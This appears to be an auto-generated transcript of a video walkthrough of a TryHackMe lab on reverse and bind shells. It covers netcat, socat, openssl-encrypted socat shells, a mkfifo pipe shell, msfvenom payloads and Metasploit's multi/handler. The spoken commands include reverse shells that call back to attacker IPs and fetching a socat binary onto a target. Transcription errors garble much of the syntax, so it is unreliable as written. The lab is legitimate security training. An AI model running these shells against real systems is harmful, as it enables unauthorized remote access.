What the Shell? - TryHackMe Junior Penetration Tester: 8.1

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello and welcome to our last section in our triac Junior penetration testing learning path first off if you made it this far congratulations in our previous episode we checked out menis the very popular exploitation framework we learned how to use it and unlock its full potential in today's episode we're going to learn how to use reverse shells an introduction to sending and receiving reverse or buying shell when exploiting Target machines I'm Brock from brockard security and let's get hacking not want so what is a shell and no not the thing that a turtle uses for armor before we can get into the intricacies of sending and receiving shells it's important to understand what a shell actually is in the simplest possible terms shells are what we use when interfacing with a command line environment or CLI in other words the common bash or sh programs in Linux are examples of shells as our cmd.exe in Powershell on Windows when targeting remote systems it is sometimes possible to force an application running on the server such as a web server for example to execute arbitrary code when this happens we want to use this initial access to obtain a shell running on the Target in simple terms we can force the server to either send us command line access to the server via a reverse shell or to open up a port on the server which we can connect to in order to execute further commands a bind shell we'll be covering both of these scenarios in further detail throughout this lesson the bulk of the room is made up of information with examples given in code blocks and screenshots there are two VMS one Linux One windows in the last two tasks of the room these can be used to practice the techniques demonstrated there are example practice questions in task 13 feel free to work through these or follow along with the tasks as you complete them there's lots of syntax in this lesson so we're just going to use their examples I'm not going to use the attack box until the end where the practice questions are going to be so I would not recommend trying to do these with your own attack box while I'm going through this lesson you can of course but you're going to be doing a lot of pausing and stopping and replaying so just treat it like you're getting equated with these Concepts and if you literally only did one example and you got something from that great of course my demonstrations are just one way there's lots of other ways if you have a different way or a better way leave it in the comments so other people can try it out and with that let's Jump Right In There are a variety of tools that we'll be using to receive reverse shells and to send bind shells and general terms we need malicious Shell Code as well as a way of interfacing with the resulting shell we will discuss each of these briefly below netcat is the traditional Swiss army knife of networking it is used to manually perform all kinds of network interactions including things like Banner grabbing during enumeration but more importantly for our uses it can be used to receive reverse shell and connect to remote ports attached to bind shells on a Target n Cat shells are very unstable by default but can be improved by techniques that we will be covering in an upcoming task socat is like netcat on steroids it can do all the same things and many more socat shells are usually more stable the netcat shells out of the box in this sense it is vastly superior to netcat however there are two big catches number one the syntax is more difficult number two netcat is installed on virtually every Linux distribution by default socat is very rarely installed by default there are workarounds to both of these problems which we will cover later on both socat and nkat have .exe versions for use on Windows systems the exploit for/ multi slh Handler module of the Metasploit framework is like socat netcat used to receive reverse shells which you may remember from the previous lesson due to being part of the metas framework multi for/ Haler provides a fully fledged way to obtain stable shells with a wide variety of further options to improve the cot shell it's also the only way to interact with a interpeter shell and is the easiest way to handle staged pay loads both of which we'll look at in task 9 like multi for/ Handler msf Venom is technically part of the menit framework however it is shipped as a standalone tool msf Venom is used to generate payloads on the Fly Wist msf Venom can generate payloads other than reverse and bind shelves these are what we will be focusing on in this lesson msf Venom is an incredibly powerful tool so we'll go into its application in much more detail in a dedicated task aside from the tools we've already covered there are some repositories of shells in many different languages one of the most prominent of these is payloads all the things the pentest monkey reverse shell cheat sheet yes that's what it's called is also commonly used in addition to these online resources Cali Linux also comes pre-installed with a variety of web shells located at/ user share SL webshell the SEC list repo repository though primarily used for wordless also contains some very useful code for obtaining shells on to task three types of shells at a high level we are interested in two kinds of shells when it comes to exploiting a Target reverse shells and bind shells reverse shells are when the target is focused to execute code that connects back to your computer or reverses it on your own computer you would use one of the tools mentioned in the previous task to set up a listener which would be used to receive the connection reverse shells are a good way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target however the drawback is that when receiving a shell from a machine across the internet you need to conf your own network to accept the shell this however will not be a problem on the triack Me Network due to the method by which we connect into the network buying shells are when the code executed on the target is used to start a listener attached to a shell directly on the target this would then be open to the internet meaning you connect to the port that the code has opened and obtained remote code execution that way this has the advantage of not requiring any configuration on your network but may be prevented by firewalls protecting the target as a general rule reverse shells are easy to execute and debu however we will cover both examples below don't worry too much about the syntax here we'll be looking at it in upcoming tasks instead note the difference between reverse shells and bind shells and the following simulations all right so first up we have the reverse shell nine times out of 10 this is what you're going to be going for especially in Capture the Flag challenges like those of tryck me take a look at the following image on the left we have reverse shell listener This Is What receives the connection on the right is a simulation of sending a reverse shell in reality this is is more likely to be done through code injection on a remote website or something along those lines picture the image on the left as being your own computer and the image on the right as being the Target on the attacking machine we see pseudo NC for netcat dlv NP 443 on the target we can see they're connecting to that netcat session by using the NC command followed by the local IP address the port D ebin SL bash notice that after running the command on the right the list Len receives a connection when the who Ami command is run we see that we are executing commands as the target user signed in as them the important thing here is that we're listening on our own attacking machine and sending a connection from the target bind shells are less common but still useful once again take a look at the following image you get on the left we have the attacker's machine computer on the right we have a simulated Target just to shake things up a little we'll use a Windows Target this time first we start a list on the target this time we're also telling it to execute C cmd.exe or the command prompt then with the listener up and running we connect from our own machine to the newly open port and as you can see on the target machine they start a listener on the Target by running net cat- lvmp the port number the newly open port 8080 D and then in quotations cmd.exe and then on the tagging machine we simply connect to that netcat session we run netcat machine IP and the port number as you can see this once again gives us code execution on the remote machine note that this is not specific to Windows the important thing to understand here is that we're listening on the target then connecting to it with our own machine the final concept which is relevant in this task is that of interactivity shells can be either interactive or noninteractive interactive is if you've used Powershell bash zsh sh or any other standard CLI environment then you will be used to interactive shells these allow you to interact with programs after executing them for example take the SSH login prompt SSH you type in the name of the user you add and then you put in the IP address of the Local Host here you can see that it's asking interactively that the user type either yes or no in order to continue this connection it's an interactive program which requires an interactive shell in order to run in order to proceed it requires that response of yes or no noninteractive shelves don't give you that luxury in a non-interactive shell you're limited to using programs which do not require user interaction in order to run properly unfortunately the majority of simple reverse and bind shell are non-interactive which can make further exploitation trickier how are you supposed to exploit something if you can't interact with it let's see what happens when we try to run ssh in a non-interactive shell as you can see here they have SSH username Murray at the local host or IP address of the local host and you can see it blanks out notice that the who am I command which is non- interactive executes almost perfectly but the SSH command which is interactive gives us no output at all as an interesting side note the output of an interactive command does go somewhere however figuring out where is an exercise for you to attempt on your own suffice to say that interactive programs do not work in non-interactive shells additionally in various places throughout this task you will see a command in screenshots called listener this command is an alias unique to the attacking machine used for demonstrations and is a shorthand way of typing suit rlw a net cat- LVN p443 so in other words it will not work on any other machine unless the Alias has been configured locally which type of shell connects back to a listening port on your computer reverse or bind well if it's going to reverse back remember that's going to be listening so it's going to be R Who nice job you've injected malicious code into a website is the shell you receive likely to be interactive yes or no the answer is unfortunately no most reverse shells the majority of them are not interactive when using a bind shell would you execute a listener on the attacker or the target this is bind it's going to be executed on that Target because everything that exploit needs is right there as mentioned previously netcat is the most basic tool in a pentesters toolkit when it comes to any kind of networking with it we can do a wide variety of interesting things but let's let's focus for now on shells in the previous task we saw that reverse shells require Shell Code and a listener there are many ways to execute a shell so we'll start by looking at listeners the Syntax for starting a netcat listener using Linux is this NC short hand for netcat dlv NP and then the port number of the target dasl is used to tell that cat that this will be a listener Das V is used to request a verbose output DN tells netkat not to resolve host names or use DNS domain name system simply links IP addresses to website addresses so when it's saying to not resolve host names or use DNS simply saying don't look for any web addresses this is the IP address that's all you're going to need- P indicates that the port specification will follow the example in the previous task used Port 443 realistically you could use any port you like as long as there isn't already a service using it be aware that if you choose to use a port below 1024 you will need to use pseudo when starting a listener that said it's often a good idea to use a well-known port number 80 443 or 53 being good choices as this is more likely to get past those outbound firewall rules on the target a working example of this would be pseudo netcat or nc- lvmp Port 443 a commonly used port for reverse sh what is 443 used for what [Music] service the service would be that's right https hypertext transfer protocol secure we can then connect back to this with any number of payloads depending on the environment on the target an example of this is displayed in the previous task if we're looking to obtain a bind shell on a Target then we can assume that there is already a listener waiting for us on a chosen Port of the target for example with all the prep work already done in the Target system for combine shells we can assume that all we need to do is connect to it the Syntax for this is relatively straightforward netcat the target IP address and then the chosen Port this case if we wanted to connect back to this netcat session it's using Port 443 so we'd simply do netcat the IP address and then 443 we will look at using netcat to create a listener for this type of shell in task 8 what's important here is that you understand how to connect to a listening Port using netcat which option tells netcat to listen well that would simply be NC short for netcat nope well if you remember from our list up here the DHL option is used to tell netcat to listen and we can see here that is correct how would you connect to a bind shell on the IP address 10101011 with port number 8080 well we'll start our Command using NC to get that netcat started we'll use the option of- L to create a listener we'll type in the IP address 10101 10101011 port number is going to be 88 and we can see here if we press enter that's correct and we wouldn't even need to put that DHL option there with bind shells it's the IP address and then the port because it's something we're connected to that's already started up on that Target machine the hard work in other words is done okay so we've caught or connected to a netcat shell what next these shells are very unstable by default pressing control C kills the whole thing they're noninteractive and often have strange formatting errors this is due to net catch shells really being processes running inside a terminal rather than being Bona terminals in their own right fortunately there are many ways to stabilize netcat shells on Linux systems we'll be looking at three here stabilization of Windows reverse shells tends to be significantly harder however the second technique that we'll be covering here is particularly useful for it the first technique we'll be discussing is only applicable to Linux boxes as they will nearly always have python installed by default Windows may not have python installed usually not installed this is a three-stage process number one first thing to do is use Python DC import PTY PTY dos spawn located in the bin bash which uses python to spawn a better featured bash shell note that some targets may need the version of python specified if this is the case replace python with python 2 or Python 3 as required at this point our shell will look a bit prettier but we still won't be able to use tab autocomplete or the arrow keys and contrl c will still kill the shell step two is export term equals x term this will give us access to term commands such as clear number third and most importantly we will back around the shell using control Z which you may remember from the metas lesson previously back in our our own terminal we use stty ra- Echo semic FG this does two things first it turns off our own terminal Echo as specified with the raw Das Echo command it then foregrounds the shell thus completing the process so all those features tab autocompletes the arrow keys control C killing the whole process is enveloped within that terminal Echo so here they're starting the netcat what kind of shell this is going to be revers because they're using net cat- LVN p and thus starting the netcat listener on Port 443 they then use Python 3 to spawn a better featured bass shell they then export the term command so they can use commands such as clear then they background the session using contrl Z and it says stopped here but it's not really stopped it's just backgrounded and then to get back into the shell they would use the foreground command or the FG command but they add the stty raw Das Echo command prior which is going to turn off the echo terminal or The Terminal echo which contains things like Auto completes for tabbing the arrow keys and control C to kill the process so you may not want to do that last step if you still want to use control C to kill the process easily as you can see after that terminal Echo was turned off they tried control C nothing happened they then run an SSH command to their next Target this is because they turned off the terminal Echo command note that if the shell dies any input in your own terminal will not be visible as a result of having disabled the terminal Echo to fix this type reset and press enter so if you turn off the terminal Echo but find yourself wanting to use the tab autocompletes or press contrl Z to easily kill the process well you can just type reset and it'll be back to normal or just don't do the third step technique two RL wrap RL wrap is a program which in simple terms gives us access to history tab autoc completion and the arrow keys immediately upon receiving a shell however some manual stabilization must still be utilized if you want to be able to use control C inside the shell RL wrap is not installed by default on Cali so first install it with pseudo AP install RL WP to use RL WP we invoke a slightly different listener RL WP nc- lvmp and then the port number prepending our netcat listener with RL WP gives us a much more fully featured shell this technique is particularly useful when dealing with window shells which are otherwise notoriously difficult to stabilize when dealing with the Linux Target it's possible to completely stabilize by using the same trick as in step three of the previous technique backgrounding the Shell with control Z then use stty ra- Echo semicolon FG to foreground that session and to stabilize and re-enter the shell technique three is socat the third easy way to stabilize a shell is quite simply to use an initial netcat shell as a stepping stone into a more fully featured socat shell bear in mind that this technique is limited to Linux Target as a socat shell on Windows will be no more stable than a netcat shell to accomplish this method of stabilization we would first transfer a socat static compiled binary which is a version of the program compiled to have no dependencies up to the Target machine a typical way to achieve this would be using a web server on the attacking machine inside the directory containing your socat binary pseudo python 3-m creating an HTTP server using Port 80 then on the target machine using the netcat Shell to download the file on Linux this would be accomplished with curl or WG WG the IP address of that python server socat d/ tm/ socat for the sake of completeness in a Windows command line environment the same can be done with Powershell using either invoke dweb request or web request system class depending on the version of Powershell installed and they have the example there we will cover the Syntax for sending and receiving shells with socat in the upcoming tasks with any of the above techniques it's useful to be able to to change your terminal size this is something that your terminal will do automatically when using a regular shell however in a reverse shell or a bind shell if you want to use something like a text editor which overwrites everything on the screen it must be done manually they then show us the process to manually change the terminal TTY size on a reverse or bind shelf first in the terminal they type st- A this will give a large stream of output they then note down the rows and columns values they then match the rows and Columns of of the attacking machine to the Target Machine by typing stty rows in the reverse or bind shell Target system they fill in the numbers they got from running the command in their own terminal this will change the registered width and height of the terminal thus allowing programs like text editors which rely on such information being accurate to correctly open how would you change your terminal size to have 238 columns well we do the command stt y to start out and then we do calls for columns and 238 which what is the Syntax for setting up a Python 3 web server on Port 80 well that's going to be using pseudo Python 3 space- m HTTP do server and then the port number 8 press enter and there we go you can also see that they use pseudo in the example socat is similar to netcat in some ways but fundamentally different in many others the easiest way to think about socat is as a connector between two points in the interest of the this will essentially be a listening port in the keyboard however it could also be a listening port in a file or indeed two listening ports all so cat does is provide a link between two points much like the portal gun from the portal games once again let's start with reverse shells as mentioned previously the Syntax for socat gets a lot harder than netcat just's the syntax for a basic reverse shell listener in soat we have socat TCP DL colon the port number and then dash at the end as always with socat this is taking two points a listening port and a standard input and then connecting them together the resulting shell is unstable but this will work on either Linux or Windows and is equivalent to net cat- lvmp the port number on Windows we would use this command to connect back socat TCP coin the local IP coin the local Port exec coin powershell.exe comma pipes the pipes option is used to force Powershell or CMD exe to use Unix style standard input and output the equivalent command for a Linux Target is socat TCP Co local IP Co local Port exec Co bash DLI in quotations for bind shells on a Linux Target we would use the following command socat TCP DL coin the port number exec coin B- Li and quotations and on a Windows Target we would use this command for a listener so cat TCP DL the port xcon powershell.exe comma pipes we use the pipes argument to interface between the Unix and windows way of handling input and output in the command line environment regardless of the target we use this command in our attacking machine to connect to the waiting list socat TCP coin the target IP address coin the Target Port and then a space Dash now let's take a look at one of the more powerful uses for socat a fully stable Linux TTY reverse shell this will only work when the target is Linux but is significantly more stable as mentioned earlier soad is an incredibly versatile tool however the following technique is perhaps one of its most useful applications here is the new listener syntax we have socat TCP DL colon the port number file colon single quote TTY single quote comma raw comma Echo equals zero let's break this command down into two parts as usual we're connecting two points together in this case those points are a listening port and a file specifically we are passing in the current TTY as a file and setting the echo to zero this is like the netcat trick that we learned earlier using control Z and bringing it back into the foreground with the added bonus of being immediately stable and hooking into a full TTY the first listener can be connected to with any payload however this special listener must be activated with a very specific socat command this means that the target must have a socat installed most machines do not have socat installed by default however it's possible to upload a pre-compiled socat binary which can then be executed as normal the special command is as follows socat TCP coin attacker IP coin attacker Port exec coin bash DLI in quotations and then comma with the arguments this is a handful so let's break it down the first part is easy right we have socat TCP the attacker IP and the attack Port we're linking up with the list are running on our own machine the second part of the command creates an inter active bash session with exec coin bash DLI we're also passing these arguments PTY which allocates a pseudo terminal on the target part of the stabilization process the STD err option makes sure that any airor messages get shown in the Shell remember with interactive shells you're likely to see those air messages but with non-interactive shells that can be a problem STD RR fixes that sigan passes any control C commands through into the subprocess allowing us to kill commands inside the shell sets ID creates the process in a new session while say stabilizes the target attempting to normalize it now that's a lot to take in so let's see it in action as normal on the left we have a listener running on our local attacking machine on the right we have a simulation of a compromised Target running with a non-interactive shell using the non-interactive netcat Shell we execute the special socat command and receive a fully interactive bash shell on The socat Listener to the left note that the socat shell is fully interactive allowing us to use interactive commands such as SSH this can then be further improved by setting the stty values as seen in the previous task which will let us use text editors such as Vim or Nano if at any point a socat shell is not working correctly it's well worth increasing the verocity by adding - d space- d into the command this is very useful for experimental purposes but is not usually necessary for General use how would we get so to listen on TCP port 8080 well assuming that we have the pseudo socat command typed in already we would type in TCP DL and then colon the port number 8080 press enter there we go got it correct nice job once again guys don't get caught up in the syntax this is a lot to take in especially for beginners so just try to start to get familiarized with these Concepts suffice it to say that anytime TCP was used as part of a command this should be replaced with open SSL when working with encrypted shells we'll cover a few examples at the end of the task but first let's talk about certificates we first need to generate a certificate in order to use encrypted shells this is easi to do on our attacking machine this command creates a 248 bit RSA key with matching CT file self-signed and valid for just under a year when you run this command it will ask you to fill in information about the certificate this can be left blank or filled randomly we then need to merge the two created files into a single pem file you can do that with a simple command as cat the two files a right arrow and then the new file name now when we set up our reverse shell listener we use the socat command this sets up an open SSL listener using our generated certificate verify equals z tells the connection to not bother trying to validate that her certificates has been properly signed by a recognized Authority please note that the certificate must be used on whichever device is listening to connect back we would use socat op SSL the IP address the local Port verify equals z and then exec b bash the same technique would apply for bind shell Target the socat open SSL and with the attacker machine we have the target IP and the Target Port verify equals zero telling the connection to not bother trying to validate the certificate by a recognized Authority and who is the one to use the certificate file not the attacker it's the listening device the Target in this case is the one who uses cert equal shell. pem the certificate file again note that even for Windows Target the certificate must be used with the listener so copying the pen file across for a bind shell is required the following images shows an open SSL reverse shell from a Linux Target as usual the target is on the right the attacker is on the left so in the example the attacker on the left uses the open SSL w-- new key creating that RSA certificate and The Listener is just listenting on the rightand side the target they use cats to merge those two files into one encrypted pem certificate so what's the goal here well the goal is to create an interactive shell right now it's non interactive but there's a key detail at the end verify equals zero which bypasses checking for any valid certificate so really they can use whatever certificate they like they can use their own certificate which is what they've done to create an interactive shell a fully interactive shell using socat but after the pem file is created and passed over we can see that we do have that interactive shell this technique will also work with the special Linux only TTY shell covered in the previous task feel free to use the Linux practice box Deployable at the end of the room to experiment if you're struggling to obtain the answer let's walk through this what is the Syntax for setting up an open SSL listener using the TTY technique from the previous task using Port 53 and a pen file called encrypt pen and they give us the hint the syntax for this without the open SSL encryption is socat TCP L coin 53 the file coin single quote TTY single quote comma raw comma Echo equals z now that syntax is actually from where the previous task you guessed it so if we check this out in task six and if you scroll down past the bash shells to the Linux TTY reverse shell techniques you'll see that the First Command right here socat TCP DL Port file coin TTY raw Echo equals z is the command that we want to copy so we'll go ahead and copy that go back to task seven and you will notice that the shadow an here looks a little bit off with the commas because we only have two and they had four in their Shadow answer as you can see one two 3 four nonetheless we'll continue on and we can see that socat TCP DL we're going to change TCP DL to what it's going to be open SSL that's what they're asking for in this question so we'll go ahead and change that the coin will be the same the port number is going to change to Port 53 so we'll go ahead and change that to 53 file is going to stay the same TTY is going to stay the same that's the same technique and it's going to be raw Echo equals z but we're not going to stop there remember we're not just changing it to open SSL from the previous command for the Target to set up an open SSL listener we have this socat open SS sl- listen called then the port number so we're going to go ahead and change that to op SSL D list then we're able to clear out that port and change that to 53 which is the port that they ask in the question then we'll go back up and we can see that the next command for the op SSL listener example is CT equal shell. pem and this is after a comma after the port so we'll do a comma after the port 53 then we'll pck paste that in seert equal shell. pem and this is actually going to be encrypt pem which is the file that they asked for in this question so we'll change that from Shell to encrypt looks like the syntax shows aha verify equals z that is going to bypass the authentication for this certificate so that no one's checking it all right so verify equals 0 is going to be right after the encrypt pen after the comma verify equals z and looks like after verify equals z there's no comma goes straight into the. cmd.exe comma pipes still for us that's going to be our file coin TTY raw Echo equal Z press enter and looks like it's correct nice job guys that one was a little bit of a do hats off to you guys that was definitely one that you had to work through a little bit in order to get the correct outcome so I don't blame you if you just looked at the answer on this one because they're pulling stuff from task six they're pulling stuff from task 7 it's just kind of all over the place the main thing is just understanding more how socat works not so much what the actual syntax is this is not stuff that you need to memorize guys don't get caught up in memorization use your brain on just trying to understand the concepts okay so if your IP is 101010 do5 what syntax would you use to connect back to the listener well the previous command that we just entered was for the Target that was the target machine now what enter the attacker machine and put in that IP address so we're going to go ahead and copy that syntax and we'll go ahead and plop that in there socat open SSL the target IP which is going to be 101010 do5 they provided that for us then call in the Target Port and that's going to be 53 verify equals z uhoh that's incorrect the Syntax for this without the open SSL encryption is soat TCP the IP address exec B- Li and then those options there at the end that was actually from the previous task so we'll go back to task six so right after that command that we copied previously the socat TCP DL normal TTY reverse shell technique command we will go ahead and copy that special command which is the socat TCP the attacker IP attacker Port bh- Li and then all those arguments at the end which help make this a stable interactive show so we're going to go ahead and copy that go back to tasks 7 go ahead and paste that in so we're going to change the TCP to open SSL we change the attacker IP to 101010 do5 we'll change that attacker port to 53 we'll leave the exec bash DLI and those arguments and press submit nice job that was a little Overkill lots of syntax that maybe we didn't really need to go into so the concept they were trying to teach here is encrypted shells but they kind of jumped right into it it's better to have a familiar understanding with certificates certificate authorities before we just go in and use these crazy syntax long commands right so you don't need to memorize this don't stress yourself out just get through the lesson and try to learn some of the concepts and just get familiar with it and just dip your toe in the water we'll soon be looking at generating payloads with msf Venom but before we do that let's take a look at some common payloads using the tools we've already covered the previous task mentioned that we'd be looking at some ways to use netcat as a listener for a buying shell so we'll start with that in some versions of netcat including the nc. exe Windows version included with Cali usershare [Music] windows-server bash connecting to the above listener with netcat would result in a bind shell on the target equally for a reverse shell connecting back with NC the local IP address The port-b Bash would result in a reverse shell on the target however this is not included in most versions of netcat as do widely seem to be insecure funny that huh funny that huh on Windows where a static binary is nearly always required anyway the technique will work perfectly here we have the make fifo Command the command to create a named pipe in Linux we have the for/ TMP forf colon so we have the first part of the pipe and then we have the second part of the pipe it's being piped into the following paragraph is a technical explanation of the command it's slightly above the level of this room maybe a little bit more than slightly so don't worry if it doesn't make much sense for now the command itself is what matters the command creates a named pipe at sltm slf it then starts a netcat listener and connects the input of The Listener to the output of the named pipe the output of The netcat Listener I.E the command we send then gets piped directly into sh sending the STD err output stream into STD out and sending STD out itself into the input of the named pipe thus completing the circle very similar command can be used to send a netcat reverse shell this command is virtually identical to the previous one other than using the netcat connect syntax as opposed to the netcat listen syntax so it's just one change pretty much from the previous command instead of- lvmp which is the listening syntax the Syntax for connecting uses the IP address when targeting a modern Windows Server it's very common to require a Powershell reverse shell so we'll be covering the standard oneliner psh reverse shell here the command is very convoluted so for the sake of Simplicity it will not be explained directly here it can however be an extremely useful oneliner here we have the Powershell do- C once again do not get hung up on the syntax here this is a big command it's a oneliner psh reverse shell which is using a Powershell reverse shell to Target modern Windows server in order to use this we need to replace the IP address and the port with an appropriate IP and choice of Port can then be copied into a cmd.exe shell or another method of executing commands on a Windows Server such as a web shell and executed resulting in a reverse shell so up top we have the listener on the bottom of the attacking machine and we can see that long big oneliner coming in right there and we can see that they have changed the IP address to 10.11.12 223 and the port to 443 for other common reverse shell payloads payload all the things as a repository containing a wide range of shell codes usually in oneliner format for copying and pasting in many different languages what command can be used to create a named pipe in Linux and the hint tells us there are technically two answers to this question the accepted one is the answer mentioned in this task so that's going to be this make fifo Commander mkfifo let's go ahead and copy that and press enter woohoo and you can go ahead and check out that payloads all the things link and they have a lot of cool payloads available in there and we'll click complete related msf Venom which we've used in our previous lesson is the One-Stop shop for all things payloads related part of the Menlo framework msf Venom is used to generate code for primarily reverse in bind shells it is used extensively in lower level exploit development to generate heximal Shell Code When developing something like a buffer overflow exploit however it can also be used to generate payloads in various formats for example exe aspx W.P for python it's this latter function that we'll be making use of in this lesson there is more to teach about msf Venom than could be ever fit into a single room let alone a single task so the following information will be a brief introduction to the concepts that will prove useful for this lesson the standard Syntax for msf Venom is as follows we have msf venom dasp the payload and the options for example to generate a Windows x64 reverse shell in an exe format we could use msf Venom DP and then we have the payload we have the format exe and then we have the options- o then we list the lhost and the L Port the four options would be DF the format specifies the output format in this case that is an executable or exe file the- o is the output location and file name for the generated payload this case it's going to be named shell. exe lhost equals IP address specifies the IP address to connect back to when using Trac me this will be your Tu zero IP address if you cannot load the link then you're not connected to the VPN go ahead and try that link if you'd like as you can see I'm not connected to the VPN so it's just going to install out don't worry about connecting to that try Haack me VPN if you have not done so already it won't be required to finish this lesson the L host they have specified as 10.11.12 223 and the L Port is the port on the local machine to connect back to this can be anything between zero and 65,535 the total number of ports that isn't already in use however ports below 1024 are restricted and require a list running with root privileges we can see the port has been set 2 443 or the h https Port before we go any further there are two concepts which must be introduced stage reverse shell payloads and stagel reverse shell payloads stage payloads are sent in two parts the first part is called the Stager and this is a piece of code which is executed directly on the server itself it connects back to a waiting listener but doesn't actually contain any reverse Shell Code by itself instead it connects to The Listener and uses the connection to load the real payload executing it directly and preventing it from touching the disc or could be caught by traditional antivirus Solutions thus the payload is split into two parts a smaller initial Stager then the bul gear reverse Shell Code which is downloaded when the Stager is activated stage payloads require a special listener usually the Met display multi- Handler which will be covered in the next task you may remember the multi-hand medit used in the Metasploit lesson previously stagelist payloads are more common these are what we've been using up until now they are entirely self-contained in that there is one piece of code which when executed sends a shell back immediately to to the waiting listener stages payloads tend to be easier to use and catch like a flyball however they are also bulkier and are easier for an antivirus or intrusion detection program to discover and remove stage payloads are harder to use but the initial Stager is a lot shorter and is sometimes missed by less effective antivirus softwares modern-day antivirus Solutions will also make use of the antim malor skin interface the amsi or Andy to detect the payload as it is loaded into memory by the Stager making stage payload less effective than they would have once been in this area on the subject of metpy another important thing to discuss is a meterpreter shell meterpreter shells are Met's own brand a fully featured shell they're completely stable making them a very good thing when working with Windows targets they also have a lot of inbuilt functionality of their own such as the file uploads and downloads if we want to use any of menit's post exploitation tools then we need to use a interpretor shell however this is a topic for another time the downside to interpretor shells is that they must be caught in menis voice if you have not checked out the menit modules yet go ahead and do that because this isn't the best introduction you may want to go through those lessons first the introduction to menit interpreter and exploitation and post exploitation they've got things in there that are some pretty good nuggets and knowledge so check it out when working with msf Venom it's important to understand how the naming system works the basic convention is as follows we have the OS or the operating system we have the arch and then we have the pay for example Linux x86 shillor reverse TCP oh and by the way Archer architecture is simply the number of bits for the processors that are using that operating system most processing bits are x64 which you may find on your own system this command would generate a stagel reverse shell for an x86 Linux Target the exception to this convention is Windows 32-bit targets for these the architecture is not specified for example Windows Shore reverse unor TCP just the OS and the payload for a 64-bit Windows Target the architecture will be specified as normal x64 x64 because most systems use 64-bit processors in the above examples the payload use was shell reverse TCP this indicates that it was a stagel payload how stagel payloads are denoted with underscores the staged equivalent to this payload will be shell SL reverse TCP as stage payloads are denoted with another forward slash this rule applies to meterpreter payloads a Windows 64-bit stage meterpreter payload would look like this stage is going to have multiple for slashes in there you may get confused because the underscore is still within the reverse uncore TCP payload but we have the majority of for slashes all throughout you're looking right before the reverse or where the end of the payload starts if it's for slash reverse uncore TCP it's going to be staged if it's underscore it's going to be stag less and here we can see a Linux 32bit stag less metor payload would look like this Linux SL x86 slmp that's a lot of for sles but hey wait the underscore reverse TCP means that it's stag less aside from the msf console man page the other important thing to note when working with msf Venom is msfvenom d-list payloads it's going to list all the payloads and can be used to list all available payloads which can then be piped into GP to search for a specific set of payloads for example we could list the payloads and then we GP for a specific one Linux SL x86 sler payload so this is going to give us the full list of available pay that are using the Linux operating system x86 for the architecture was actually going to be 32 bits it's weird x86 and x64 x64 has 64-bit processors but for some reason old Intel processors that ended with x86 it just kept the name even though it was a 16-bit processor now it's 32-bit processor so this is going to sech for 32-bit processors for the Linux operating system and interpreter payloads generate a staged reverse shell for 6 4bit Windows Target in aexe format using your tryhackme t0 IP address in the chosen port and the hint says all you need to do is substitute in your own T10 address and chosen Port so this room is actually set up a little bit different than most try hackme rooms instead of having the attack box and the attack machine like you would normally do this actually has required a triac VPN now we're not using the VPN and you don't have to either you can just click complete on this because this question is actually the same as this third question down here both questions are asking you to create a staged reverse shell payload for 64bit Target systems one is a Windows system which is the first one one is a Linux system so we're going to come up with the Syntax for the Linux Target and the IP address is also of course going to be different so it's just the OS and IP address that are different but it's going to use the same command that was given to us in the task right up here for example msf Venom - P the payload the file type which is going to be EXE the name nameing Convention of the file and then what's the IP address that we're using and what's the port so we'll go ahead and copy that command and paste it in so we have the command msf vm- P we're going to swap this windows with a Linux system because this is a Linux Target so we're going to actually take the command right here from the Linux 32-bit stagelist interpreter payload so that's actually another differentiation between the first question and the third question besides the OS and the file name it's actually going to be a interpreter payload so we'll go ahead and grab this Command right here for Linux systems x64 is what we're going to change it to we'll put that in place of the windows x64 shell reverse TCP which is the basic stage reverse shell payload and we'll change the x86 to x64 we'll keep The Interpreter _ reverse TCP that's just one p and then we'll keep the - fexe it's still going to be an executable file it's just going to be an executable file within the Linux Target system so we'll change the name to- shell. because it's going to be an elf file and elf is an executable file within Linux systems so we have that and then we'll change the lhost which is going to be listening host to the IP address that they give us 101105 and we'll change the L port to the port number that they provide us 443 for https Center and that's correct nice job guys once again that first question required the VPN and of course I'm not using the VPN if I attempt to to look at the t zero IP address it just errors out and of course the instructions for connection to the VPN is of course aired out as well there is actually instructions there's actually a room for connecting to the openvpn for trackme but this is actually not required we actually have the same question asked there in the third question there's very minor differences between the first question and the third question the third is going to have a different OS it's going to have a different file type the elf and we have that different IP address of course and it's also using interpreter but aside from that it's basically the same it's just how to use a staged reverse shell and in this case a interpreter staged reverse shell which symbol is used to show that a shell is stagel so remember we have the forward slash and we have the underscore question is which one is which it can get kind of confusing especially if you're seeing multiple underscores or multiple forward slashes for stagelist is going to be an underscore you can think of a underscore stag less payloads as doing everything bing bang Bongo I if they still teach that in schools you can think of a forward slash the stage pose as just a bing and then it has to connect back to get that bang and then it has to go back to the Target to get that Bongo the full setup so it's definitely less work to do the Stag less at least when you're actually there executing the payload but the stage less payloads may take a little bit more time a little more prep time to actually get it started so stage less bing bang Bongo stage four is going to be Bing or Bing now remember placement is key and I don't know if triak is wrong on this or if I just don't understand it but usually the staged or stag list is indicated by the meterpreter and then reverse what's in between that interpreter uncore reverse so technically when we're looking at this command that we did for question three it looks like a stag less payload but they asked us for a staged matp reverse shell with the 64 Linux Target and in the example they show us the windows interpreter for/ reverse as the stage payload and then the L interpreter uncore reverse as the stage less payload so when you're determining if it's a staged or stage less payload you can look between The Interpreter and reverse or you can also look at the full file name of that payload the full thing starting from interpreter let get a little confusing but A good rule of thumb is that the more underscores you see the more likely it's going to be a stagelist payload the more forward slashes you see the more likely it's going to be a stage payload stag less stage stag less multi- Handler is a superb tool for catching reverse shells you may remember the multi- Handler from our previous met boy lessons it's essential if you want to use matp shells and they go to when using staged payloads fortunately It's relatively easy to use open menplay with msf console you type use multi Handler and press enter you are now primed to start a multi- Handler session let's take a look at the available options using the options command there are three options we need to set payload the lhost and the L Port these are all identical to the options we set when gending Shell Code with msf Venom a payload specific to our Target as well as a listening address and port with which we can receive a shell note that the lhost must be specified here as met will not listen on all network interfaces like netcat or socat will it must be told a specific address to listen with when using Tracy this will be your t z address if you're using the tryhackme openvpn we set these options with the following commands set payload set lhost and set L Port followed by the payload the IP address on the port we should now be ready to start the listener let's do this by using the the exploit DJ command which tells Menlo to launch the module running as a job in the background so the exploit DJ command is essentially the same as just running exploit and then backgrounding the session using the background command after you've exploited it's just a faster way of doing it you may notice that in the above screenshot medit is listening on a port under that 1024 or 1024 port to do this Metasploit must be run with the pseudo permissions when the stage payload generated in the previous task is run medis receives the connection sending the 